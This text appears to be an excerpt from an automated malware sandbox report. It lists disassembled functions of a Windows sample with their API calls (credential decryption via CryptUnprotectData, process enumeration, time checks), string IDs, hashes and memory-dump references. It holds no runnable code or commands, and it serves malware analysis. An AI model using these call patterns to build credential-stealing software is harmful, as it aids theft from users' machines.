                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "Smu$&aUs$)^{$)^{$7R|$S*_$T~vv
                                  • API String ID: 0-2751973585
                                  • Opcode ID: 7fe6fd441e4c914d504628c93ae3ccb13f12e3f4dc25b28b3bc8aeca8f9a18e5
                                  • Instruction ID: c1c31faa17fcc300af8c396d771e73540db8e91b96b943f7d84370f07fbc982f
                                  • Opcode Fuzzy Hash: 7fe6fd441e4c914d504628c93ae3ccb13f12e3f4dc25b28b3bc8aeca8f9a18e5
                                  • Instruction Fuzzy Hash: ADB2E5F360C2049FE7046E29EC8567AFBE9EF94720F1A493DEAC4C7744EA3558018796
                                  Function 00362C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00362C42
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00362C49
                                  • GetTimeZoneInformation.KERNEL32(?), ref: 00362C58
                                  • wsprintfA.USER32 ref: 00362C83
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID: wwww
                                  • API String ID: 3317088062-671953474
                                  • Opcode ID: ed0dbd30c348cc523da3261b4cccbcefcaf14f1be0d89fcb11baf5f5e61aa92f
                                  • Instruction ID: 6282db4eddaf5165e1e6643bbe7c96bdf33375c58b091872832398dd9fcaba5b
                                  • Opcode Fuzzy Hash: ed0dbd30c348cc523da3261b4cccbcefcaf14f1be0d89fcb11baf5f5e61aa92f
                                  • Instruction Fuzzy Hash: 04012BB1A40604ABD7189F58DC4DFAEBB6DEB84721F008329F91AD73C0D77419048AE1
                                  Function 00706A9B Relevance: 7.8, Strings: 5, Instructions: 1578COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $fo3$2Zx{$AGw$K1~7$d[=
                                  • API String ID: 0-2252361041
                                  • Opcode ID: 8f0393b8fb569d6061e0952ccc9962258649a6f32456e79d0d60f4ebb9d879a3
                                  • Instruction ID: be14e8b493d5a7422b4ad43241b015f76e1400aa4ef31ac0ab674ce0d0f32692
                                  • Opcode Fuzzy Hash: 8f0393b8fb569d6061e0952ccc9962258649a6f32456e79d0d60f4ebb9d879a3
                                  • Instruction Fuzzy Hash: DAB2E3F260C2049FE704AE2DEC8567AFBE5EF94720F1A493DEAC4C3744EA3558058697
                                  Function 00361B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00361B72
                                    • Part of subcall function 00361820: lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0036184F
                                    • Part of subcall function 00361820: lstrlen.KERNEL32(00F96080), ref: 00361860
                                    • Part of subcall function 00361820: lstrcpy.KERNEL32(00000000,00000000), ref: 00361887
                                    • Part of subcall function 00361820: lstrcat.KERNEL32(00000000,00000000), ref: 00361892
                                    • Part of subcall function 00361820: lstrcpy.KERNEL32(00000000,00000000), ref: 003618C1
                                    • Part of subcall function 00361820: lstrlen.KERNEL32(00374FA0), ref: 003618D3
                                    • Part of subcall function 00361820: lstrcpy.KERNEL32(00000000,00000000), ref: 003618F4
                                    • Part of subcall function 00361820: lstrcat.KERNEL32(00000000,00374FA0), ref: 00361900
                                    • Part of subcall function 00361820: lstrcpy.KERNEL32(00000000,00000000), ref: 0036192F
                                  • sscanf.NTDLL ref: 00361B9A
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00361BB6
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00361BC6
                                  • ExitProcess.KERNEL32 ref: 00361BE3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 3040284667-0
                                  • Opcode ID: 1f68f9f97b41d79017047beb5291fc3107b54b9be59b11bfe7711fad92c66a6b
                                  • Instruction ID: 07e7bd6a03ef80503a6999f501aed7b107faca756faf78d2accd1db559a349b3
                                  • Opcode Fuzzy Hash: 1f68f9f97b41d79017047beb5291fc3107b54b9be59b11bfe7711fad92c66a6b
                                  • Instruction Fuzzy Hash: 0C21E2B1518301AF8354DF69D88485FBBF8EED8314F408A1EF599C3220E730E5089BA6
                                  Function 00347750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0034775E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00347765
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0034778D
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003477AD
                                  • LocalFree.KERNEL32(?), ref: 003477B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 14596ea9c9b96ffe52b42c8d22ea58fbd809c08eeefe4605977d92672dff773a
                                  • Instruction ID: be6f63fb40e18584736300aaa83945bf9c44acba47362234b325b637c915ae44
                                  • Opcode Fuzzy Hash: 14596ea9c9b96ffe52b42c8d22ea58fbd809c08eeefe4605977d92672dff773a
                                  • Instruction Fuzzy Hash: A6012575B503087FEB10DB94DC4AFAA7B78EB44B11F104155FB09EB2C0D6B0A944D7A0
                                  Function 006FE345 Relevance: 6.6, Strings: 4, Instructions: 1648COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: >-4[$G+W$Zeo$vw
                                  • API String ID: 0-3707004711
                                  • Opcode ID: 8cc34feeb77ab94651c488906d4482f9d4c5241086beaed8d8f3377c70f27689
                                  • Instruction ID: e753d9443d39b9f47c7fd3a551deac6a60c0d72448c5cc874ee533ee9d385189
                                  • Opcode Fuzzy Hash: 8cc34feeb77ab94651c488906d4482f9d4c5241086beaed8d8f3377c70f27689
                                  • Instruction Fuzzy Hash: 0BB236F3A0C2049FE304AE2DEC8567AB7E5EF94720F1A893DEAC4C7744E63559018697
                                  Function 00701AA1 Relevance: 6.6, Strings: 4, Instructions: 1644COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $#o$2fVm$Cb|?$pT|
                                  • API String ID: 0-3701734100
                                  • Opcode ID: 2f5df29753d988f60c5fc98793652b7d3addb8bc1bd421abd7ce2684f36de281
                                  • Instruction ID: 4f627264aa4d23c200270f40717e27818655f01a5badc335b643fb5f08e9cda5
                                  • Opcode Fuzzy Hash: 2f5df29753d988f60c5fc98793652b7d3addb8bc1bd421abd7ce2684f36de281
                                  • Instruction Fuzzy Hash: 2EB239F3A082049FE3046E2DEC9577AB7E9EFD4720F1A463DEAC4C3744EA3558058696
                                  Function 0070515D Relevance: 6.5, Strings: 4, Instructions: 1541COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,#rq$/<u$<+c?$coNq
                                  • API String ID: 0-4260325508
                                  • Opcode ID: d4d0db0f03eb0630bb7df013bef42e9238dc47918bfff3a3fb3a88e1cd85f6d9
                                  • Instruction ID: 42d6ef1eeb833669e26e06be63889470e23ac2a5ce78fec341563935faa657b3
                                  • Opcode Fuzzy Hash: d4d0db0f03eb0630bb7df013bef42e9238dc47918bfff3a3fb3a88e1cd85f6d9
                                  • Instruction Fuzzy Hash: C6A2D3F360C204AFE704AE2DEC8567ABBE9EF94720F16492DE6C4C3740EA3558458797
                                  Function 00363A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003671FE
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00363A96
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00363AA9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00363ABF
                                    • Part of subcall function 00367310: lstrlen.KERNEL32(------,00345BEB), ref: 0036731B
                                    • Part of subcall function 00367310: lstrcpy.KERNEL32(00000000), ref: 0036733F
                                    • Part of subcall function 00367310: lstrcat.KERNEL32(?,------), ref: 00367349
                                    • Part of subcall function 00367280: lstrcpy.KERNEL32(00000000), ref: 003672AE
                                  • CloseHandle.KERNEL32(00000000), ref: 00363BF7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: c7d496f4338e113b4a17d737c685ef508e6baacc27799c31982130d3bfef9fd8
                                  • Instruction ID: 734b326e3cbb6ab89351072e1ad0fd601a3318d5d512e2efb7d4738914e2ece6
                                  • Opcode Fuzzy Hash: c7d496f4338e113b4a17d737c685ef508e6baacc27799c31982130d3bfef9fd8
                                  • Instruction Fuzzy Hash: FB81F230905204CFC716CF18D888BA5B7F1FB45328F2AC1A9E4099B2A6D7769D86DF90
                                  Function 0034EA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0034EA76
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0034EA7E
                                  • lstrcat.KERNEL32(0036CFEC,0036CFEC), ref: 0034EB27
                                  • lstrcat.KERNEL32(0036CFEC,0036CFEC), ref: 0034EB49
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 1dfaf494a477801e24c0b7276af0afbedd31c5b95543d489cf00e3e6b9a58457
                                  • Instruction ID: e6ba2a6c932b52090bf8a2708ad7344a8a181d2dd62360f068af77e596768896
                                  • Opcode Fuzzy Hash: 1dfaf494a477801e24c0b7276af0afbedd31c5b95543d489cf00e3e6b9a58457
                                  • Instruction Fuzzy Hash: B9310775A14219ABDB109B58EC49FFFBB7DEF44701F0041A5F90DE7240DBB05A489BA2
                                  Function 003640B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 003640CD
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 003640DC
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003640E3
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00364113
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
